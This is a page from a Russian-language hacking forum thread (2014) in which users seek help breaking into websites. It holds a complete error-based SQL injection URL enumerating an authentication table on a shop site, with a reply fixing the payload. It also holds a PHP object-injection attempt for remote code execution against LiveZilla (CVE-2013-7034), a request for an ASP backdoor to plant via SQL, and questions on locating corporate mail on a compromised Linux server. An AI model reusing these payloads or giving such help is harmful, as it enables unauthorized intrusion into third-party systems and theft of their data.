Старый 03.09.2014, 16:19   #3281
avenu
 
Аватар для avenu
 
Регистрация: 10.07.2010
Сообщений: 36
Репутация: 13
По умолчанию

И еще подскажите хороший сканер папок со словарем, очень желательно на php
upd нашел пхпфастсканер, верхний вопрос актуален
__________________
С утра и навсегда

Последний раз редактировалось avenu; 03.09.2014 в 16:28..
avenu вне форума   Ответить с цитированием
Старый 06.09.2014, 22:20   #3282
lex luthor
 
Аватар для lex luthor
 
Регистрация: 17.04.2014
Сообщений: 6
Репутация: 0
По умолчанию

Нужна помощь в раскрутке скули. В общем запрос такой -
ххх.com/shop/item.php?it_id=325474 OR (SELECT COUNT() FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select column_name from information_schema.columns where table_name=0x2767345f617574683127 limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
Выдает пустую страницу. При чем, когда крутил table_name через запрос:
ххх.com/shop/item.php?it_id=325474 OR (SELECT COUNT() FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
показывало нормально. В чем ошибка?
lex luthor вне форума   Ответить с цитированием
Старый 07.09.2014, 10:21   #3283
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от lex luthor Посмотреть сообщение
Нужна помощь в раскрутке скули. В общем запрос такой -
ххх.com/shop/item.php?it_id=325474 OR (SELECT COUNT() FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select column_name from information_schema.columns where table_name=0x2767345f617574683127 limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
Выдает пустую страницу. При чем, когда крутил table_name через запрос:
ххх.com/shop/item.php?it_id=325474 OR (SELECT COUNT() FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
показывало нормально. В чем ошибка?
table_name=0x67345f6175746831 not 0x2767345f617574683127
spari вне форума   Ответить с цитированием
Старый 07.09.2014, 10:38   #3284
lex luthor
 
Аватар для lex luthor
 
Регистрация: 17.04.2014
Сообщений: 6
Репутация: 0
По умолчанию

Точно, 0x67345f6175746831. Но теперь пустую страницу выдает.
lex luthor вне форума   Ответить с цитированием
Старый 16.09.2014, 18:28   #3285
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Подскажите простенький asp бэкдор, необходимо залить через sql.

при заливке шелла в начале и в конце добавляется:
Код:
\N	\N	text	\N	\N
z0mbie вне форума   Ответить с цитированием
Старый 16.09.2014, 20:00   #3286
mrakz
 
Регистрация: 16.09.2014
Сообщений: 1
Репутация: 0
По умолчанию

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7034
PHP код:
function setCookieValue($_key,$_value)
{
    global 
$CONFIG;
    if(!isset(
$_COOKIE["livezilla"]))
        
$c_array = Array();
    else
        
$c_array = @unserialize(@base64_decode($_COOKIE["livezilla"]));
    if(!isset(
$c_array[$_key]) || (isset($c_array[$_key]) && $c_array[$_key] != $_value))
    {    
        
$c_array[$_key] = $_value;
        
setcookie("livezilla",($_COOKIE["livezilla"] = base64_encode(serialize($c_array))),time()+($CONFIG["gl_colt"]*86400));
    }

Делаю так O:4:"lala":1:{s:4:"_key";s:9:"phpinfo()";} конверчу в Base64, сую в куки, в итоге RCE не получается, натолкните на путь истинный.
mrakz вне форума   Ответить с цитированием
Старый 16.09.2014, 20:44   #3287
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Цитата:
Сообщение от mrakz Посмотреть сообщение
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7034
PHP код:
function setCookieValue($_key,$_value)
{
    global 
$CONFIG;
    if(!isset(
$_COOKIE["livezilla"]))
        
$c_array = Array();
    else
        
$c_array = @unserialize(@base64_decode($_COOKIE["livezilla"]));
    if(!isset(
$c_array[$_key]) || (isset($c_array[$_key]) && $c_array[$_key] != $_value))
    {    
        
$c_array[$_key] = $_value;
        
setcookie("livezilla",($_COOKIE["livezilla"] = base64_encode(serialize($c_array))),time()+($CONFIG["gl_colt"]*86400));
    }

Делаю так O:4:"lala":1:{s:4:"_key";s:9:"phpinfo()";} конверчу в Base64, сую в куки, в итоге RCE не получается, натолкните на путь истинный.
Это не так делается,
Цитата:
The setCookieValue function in _lib/functions.global.inc.php in LiveZilla before 5.1.2.1 allows remote attackers to execute arbitrary PHP code via a serialized PHP object in a cookie.
Статья на тему: https://rdot.org/forum/showthread.php?t=950

Прочитай её и поищи в коде продукта класс который позволит тебе это сделать.
Enigma вне форума   Ответить с цитированием
Старый 18.09.2014, 21:37   #3288
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Подскажите как в linux узнать к какому сервису привязана корпоративная почта, или вообще как найти вход в почту. И где хранятся письма?
z0mbie вне форума   Ответить с цитированием
Старый 19.09.2014, 12:52   #3289
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Здравствуйте, все
Нулевой байт еще работает в php?
omen666 вне форума   Ответить с цитированием
Старый 20.09.2014, 22:26   #3290
Ravenous
 
Аватар для Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Цитата:
Сообщение от omen666 Посмотреть сообщение
Здравствуйте, все
Нулевой байт еще работает в php?
Начиная с 5.3.3 или с 5.3.4 - нит
Ravenous вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot